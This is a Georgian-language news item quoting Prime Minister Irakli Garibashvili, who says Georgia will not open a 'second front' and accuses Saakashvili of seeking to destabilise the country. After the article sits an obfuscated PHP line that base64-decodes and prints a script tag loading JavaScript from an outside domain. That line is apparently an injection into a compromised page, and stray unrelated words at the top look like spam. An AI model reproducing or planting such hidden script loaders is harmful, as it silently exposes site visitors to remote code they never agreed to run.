celsiusi
ავერსი შნაიდერი
საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა ჟურნალისტებთან საუბრისას განაცხადა, რომ არანაირი მეორე ფრონტი და მეორე ომი საქართველოში არ იქნება.
 
"დღეს ხელისუფლებაში რომ ყოფილიყო სააკაშვილი, აქ იქნებოდა ომი, აქ მოაწყობდნენ მეორე მარიუპოლს ეს იყო განზრახვა და მინდა, მთავარი კითხვა დაგისვათ, რატომ ჩამოვიდა საქართველოში სააკაშვილი? სააკაშვილი ჩამოვიდა ერთი მიზნით, რომ მოეხდინა დესტაბილიზაცია ქვეყანაში, რევოლუცია, მასობრივი მკვლელობები, მათ შორის ოპოზიციური ლიდერების მკვლელობები და მომხდარიყო გადატრიალება. ეს პირდაპირ ნიშნავდა ოკუპირებულ ქვეყანაში ახალი ომის დაწყებას. გესმით, რამხელა ბინძურ პროვოკაცია ავარიდეთ ჩვენ.
 
მინდა, ყველას ვუთხრა – მე ვიცი, რომ იმედები გავუწბილე ყველა ვითომ მეგობარს, ვისაც სურდა ომი ჩემსა და თქვენს ქვეყანაში, ჩვენი ხალხის მოკვლა, გაუბედურება და განადგურება ქვეყნის, ვპირდები მათ, რომ ყოველთვის გავუწბილებ იმედებს. არანაირი მეორე ფრონტი, არანაირი ომი საქართველოში არ იქნება, ეს არის ჩვენი პრინციპული გადაწყვეტილება“, – განაცხადა ღარიბაშვილმა.
 
 
 
 
 
701
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");